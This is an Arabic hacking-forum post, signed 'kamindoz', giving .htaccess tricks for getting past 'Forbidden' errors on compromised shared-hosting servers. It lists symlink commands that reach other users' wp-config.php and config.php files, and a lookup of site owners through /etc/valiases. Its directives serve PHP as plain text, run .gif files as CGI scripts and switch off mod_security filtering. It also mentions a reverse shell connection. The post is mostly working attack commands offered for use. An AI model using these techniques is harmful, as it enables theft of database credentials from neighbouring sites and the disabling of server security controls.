كيفكم ان شاء الله الجميع بخير ..
كترت مشاكل الفوربيدون وكلنا هون
لتبادل الفائدة ..
الي مش عارف شو هاتكــس :
هو يستخدم لتخطي الفور بيدون
عند عمل اختصار للسيرفر
او سحب كنفق بصيغة معينة الخ
اولا هون هــأتكـس تخطي :
اتصل بالسيرفر اتصال
عكسي ببورت 21 او 443 :
انـشى دايـركت ثم
[HTML]Options +FollowSymLinks
DirectoryIndex Sux.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html [/HTML]
[HTML]Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html [/HTML]
آنشى من الشيل اختصار بــ .htaccess
ln -s /home/user/public_html/wp-config.php conf.ini
[HTML]Options Indexes FollowSymLinks
DirectoryIndex confi.htm [/HTML]
ثلاثآ :
سحب الكنفق عن طريق html
اول شي هون يكون نطلع يوزر الموقع
ls -ls /etc/valiases/site.com
ln -s home/user/public_html/config.php config.html
[HTML]Options Indexes FollowSymLinks
DirectoryIndex config.htm [/HTML]
تخطي اصدار الاباتشي في
php 5.2.17 وسحب الكنفق بـ
الصيغة shtml :
اول نعمل دايركت بعيدها ننفذ
امر سحب للكنفق بصيغة txt
ln -s /home/user/public_html/config.php 1.txt
الان بنروح لشيل طال عمرك ونعمل
ملف جديد هاتكس يعني .htaccess
بكون بنفس الدايركت الي سحبنا فيه
<!--#include virtual="1.shtml"-->
الصفحة بظهر لك مباشرة .
خامسا :
سحب عن طريق صورة :
نسحب بصورة وهي الحالة نسخدم معها
هي الهتكـس :
[HTML]Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .gif
AddHandler cgi-script .gif
AddHandler cgi-script .gif [/HTML]
[HTML]Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddHandler cgi-script .psy
AddHandler cgi-script .psy [/HTML]
وانا ازيد علي الموضوع بعض الهاتكسات الى تتخطي
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
Options +FollowSymLinks
DirectoryIndex Index.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
حدك القيام بيه
<Files *.php>ForceType application/x-httpd-php4</Files>
<ifModule mod_security.c>SecFilterEngine Off
SecFilterScanPOST Off</IfModule>
| روابط هذه التدوينة قابلة للنسخ واللصق | |
| URL | |
| HTML | |
| BBCode | |
kamindoz
